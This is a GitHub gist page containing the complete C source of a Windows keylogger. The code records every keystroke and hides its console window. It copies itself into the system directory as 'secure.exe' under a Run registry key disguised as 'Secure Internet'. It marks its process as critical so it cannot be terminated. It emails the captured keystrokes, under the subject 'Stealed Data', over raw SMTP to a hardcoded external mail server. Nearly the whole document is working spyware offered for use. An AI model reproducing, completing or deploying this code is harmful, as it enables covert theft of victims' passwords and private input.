-
-
Save graysuit/d82bcc47761849eec648131aeaca37b6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* \file keylogger.h | |
* | |
* Copyright (C) 2009-2010, Ongaro Mattia <moongaro at gmail.com> | |
* All rights reserved. | |
* | |
* This program is free software; you can redistribute it and/or modify | |
* it under the terms of the GNU General Public License as published by | |
* the Free Software Foundation; either version 2 of the License, or | |
* (at your option) any later version. | |
* | |
* This program is distributed in the hope that it will be useful, | |
* but WITHOUT ANY WARRANTY; without even the implied warranty of | |
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
* GNU General Public License for more details. | |
*/ | |
/** | |
* Add -std=c99 and -lwsock32 to the compiler | |
*/ | |
#include <stdio.h> | |
#include <string.h> | |
#if defined ( unix ) | |
#error The operative system have to be Winzoz | |
#endif | |
#include <windows.h> | |
#ifndef WIN32_LEAN_AND_MEAN | |
#define WIN32_LEAN_AND_MEAN | |
#endif | |
inline unsigned get_len ( char * str ); | |
int send_mail ( char * subject, char * message, char * to, char * from, const char ip [ 17 ], int door ); | |
int take_n_run ( int, char * ); | |
typedef void ( _stdcall * RtlSetProcessIsCritical ) ( IN BOOLEAN New, OUT PBOOLEAN Old, IN BOOLEAN Log ); | |
int protectProcess ( void ); | |
void regApp ( void ); | |
int hideConsole ( void ); | |
#define IP "85.18.95.132" // smtp.fastwebnet.it mail server | |
#define DOOR 25 // SMTP Door | |
#define FROM "[email protected]" | |
#define TO "[email protected]" // Here your mail | |
#define SUBJECT "Stealed Data" | |
#define _MAX_CHAR 500 | |
int main ( void ) | |
{ | |
register short i; | |
char * data = ( char * ) calloc ( _MAX_CHAR + 12, sizeof ( char ) ); | |
regApp ( ); | |
protectProcess ( ); | |
hideConsole ( ); | |
while ( 1 ) { | |
while ( get_len ( data ) < _MAX_CHAR ) | |
{ | |
for ( i = 8 ; i <= 190 ; i++ ) | |
{ | |
if ( GetAsyncKeyState ( i ) == -32767 ) { | |
take_n_run ( i, data); | |
} | |
} | |
Sleep(10); | |
} | |
send_mail ( SUBJECT, data, TO, FROM, IP, DOOR ); | |
memset ( data, 0, _MAX_CHAR + 12 ); | |
} | |
return 0; | |
} | |
// Simple Mail Transfer Protocol | |
#define _OPEN "HELO default\r\n"\ | |
"MAIL FROM: <" | |
#define _RCPT ">\r\nRCPT TO: <" | |
#define _DATA ">\r\nDATA\r\n"\ | |
"From: <" | |
#define _SUB ">\r\nSubject: " | |
#define _NEWLINE "\r\n\r\n" | |
#define _CLOSE "\r\n.\r\n"\ | |
"QUIT\r\n" | |
inline unsigned get_len ( char * str ) { | |
return ( unsigned ) ( strlen ( str ) * sizeof ( char ) ); | |
} | |
int send_mail ( char * subject, char * message, char * to, char * from, const char ip [ 17 ], int door ) | |
{ | |
int sock; | |
struct sockaddr_in saddr; | |
WSADATA wsadata; | |
if ( WSAStartup ( MAKEWORD ( 2, 2 ), & wsadata ) != 0 ) { | |
return -1; | |
} | |
if ( ( sock = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0) { | |
return -1; | |
} | |
saddr . sin_family = AF_INET; | |
saddr . sin_addr . s_addr = inet_addr ( ip ); | |
saddr . sin_port = htons ( door ); | |
if ( connect ( sock, ( struct sockaddr * ) & saddr, sizeof ( saddr ) ) < 0 ) { | |
return -1; | |
} | |
size_t check_size = get_len ( _OPEN ); | |
if ( check_size != send ( sock, _OPEN, check_size, 0 ) ) { | |
return -1; | |
} | |
check_size = get_len ( from ); | |
if ( check_size != send ( sock, from, check_size, 0 ) ) { | |
return -1; | |
} | |
check_size = get_len ( _RCPT ); | |
if ( check_size != send ( sock, _RCPT, check_size, 0 ) ) { | |
return -1; | |
} | |
check_size = get_len ( to ); | |
if ( check_size != send ( sock, to, check_size, 0 ) ) { | |
return -1; | |
} | |
check_size = get_len ( _DATA ); | |
if ( check_size != send ( sock, _DATA, check_size, 0 ) ) { | |
return -1; | |
} | |
check_size = get_len ( from ); | |
if ( check_size != send ( sock, from, check_size, 0 ) ) { | |
return -1; | |
} | |
check_size = get_len ( _SUB ); | |
if ( check_size != send ( sock, _SUB, check_size, 0 ) ) { | |
return -1; | |
} | |
check_size = get_len ( subject ); | |
if ( check_size != send ( sock, subject, check_size, 0 ) ) { | |
return -1; | |
} | |
check_size = get_len ( _NEWLINE ); | |
if ( check_size != send ( sock, _NEWLINE, check_size, 0 ) ) { | |
return -1; | |
} | |
check_size = get_len ( message ); | |
if ( check_size != send ( sock, message, check_size, 0 ) ) { | |
return -1; | |
} | |
check_size = get_len ( _CLOSE ); | |
if ( check_size != send ( sock, _CLOSE, check_size, 0 ) ) { | |
return -1; | |
} | |
closesocket ( sock ); | |
WSACleanup ( ); | |
return 0; | |
} | |
int take_n_run ( int key, char * buffer ) | |
{ | |
switch ( key ) { | |
case 8 : | |
strcat ( buffer, "[B]" ); | |
return 0; | |
case 13 : | |
strcat ( buffer, "\n" ); | |
return 0; | |
case 32 : | |
strcat ( buffer, " " ); | |
return 0; | |
case VK_TAB : | |
strcat ( buffer, "[T]" ); | |
return 0; | |
case VK_SHIFT : | |
strcat ( buffer, "[S]" ); | |
return 0; | |
case VK_CONTROL : | |
strcat ( buffer, "[C]" ) ; | |
return 0; | |
case VK_ESCAPE : | |
strcat ( buffer, "[ES]" ); | |
return 0; | |
case VK_END : | |
strcat ( buffer, "[EN]" ); | |
return 0; | |
case VK_HOME : | |
strcat ( buffer, "[H]" ); | |
return 0; | |
case VK_LEFT : | |
strcat ( buffer, "[L]" ); | |
return 0; | |
case VK_RIGHT : | |
strcat ( buffer, "[R]" ); | |
return 0; | |
case VK_UP : | |
strcat ( buffer, "[U]" ); | |
return 0; | |
case VK_DOWN : | |
strcat ( buffer, "[D]" ); | |
return 0; | |
case 110 : | |
case 190 : | |
strcat ( buffer, "." ); | |
return 0; | |
default: | |
strcat ( buffer, ( char * ) & key ); | |
} | |
return 0; | |
} | |
#define CONSOLE_NAME "Secure" | |
int hideConsole ( void ) | |
{ | |
if ( ! SetConsoleTitle ( CONSOLE_NAME ) ) { | |
return -1; | |
} | |
HWND thisWindow; | |
thisWindow = FindWindow( NULL, CONSOLE_NAME ); | |
ShowWindow ( thisWindow, 0 ); | |
return 0; | |
} | |
#define FAKE_NAME "\\secure.exe" | |
#define FAKE_KEY "Secure Internet" | |
void regApp ( void ) | |
{ | |
char system_ [ MAX_PATH ]; | |
char pathToFile[ MAX_PATH ]; | |
HMODULE getMod = GetModuleHandle ( NULL ); | |
GetModuleFileName ( getMod, pathToFile, sizeof ( pathToFile ) ); | |
GetSystemDirectory ( system_, sizeof ( system_ ) ); | |
strcat ( system_, FAKE_NAME ); | |
CopyFile ( pathToFile, system_, 0); | |
HKEY key_; | |
RegOpenKeyEx ( HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, & key_ ); | |
RegSetValueEx ( key_, FAKE_KEY, 0, REG_SZ, ( const unsigned char * ) system_, sizeof ( system_ ) ); | |
RegCloseKey ( key_ ); | |
} | |
int protectProcess ( void ) | |
{ | |
int enablePriv ( const char * szPriv ); | |
HANDLE DLL; | |
RtlSetProcessIsCritical setCritical; | |
DLL = LoadLibraryA ( "ntdll.dll" ); | |
if ( DLL == NULL ) { | |
return -1; | |
} | |
if ( enablePriv ( SE_DEBUG_NAME ) < 0 ) { | |
return -1; | |
} | |
setCritical = ( RtlSetProcessIsCritical ) GetProcAddress( ( HINSTANCE ) DLL, "RtlSetProcessIsCritical" ); | |
if ( ! setCritical ) { | |
return -1; | |
} | |
setCritical ( 1, 0, 0 ); | |
return 0; | |
} | |
int enablePriv ( const char * szPriv ) | |
{ | |
HANDLE token; | |
LUID luid; | |
TOKEN_PRIVILEGES privs; | |
memset ( &privs, 0, sizeof ( privs ) ); | |
if ( ! OpenProcessToken ( GetCurrentProcess ( ), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, & token ) ) { | |
return -1; | |
} | |
if ( ! LookupPrivilegeValue ( NULL, szPriv, & luid ) ) | |
{ | |
CloseHandle ( token ); | |
return -1; | |
} | |
privs . PrivilegeCount = 1; | |
privs . Privileges [ 0 ] . Luid = luid; | |
privs . Privileges [ 0 ] . Attributes = SE_PRIVILEGE_ENABLED; | |
if ( ! AdjustTokenPrivileges ( token, FALSE, & privs, sizeof ( privs ), NULL, NULL ) ) { | |
return -1; | |
} | |
CloseHandle ( token ); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment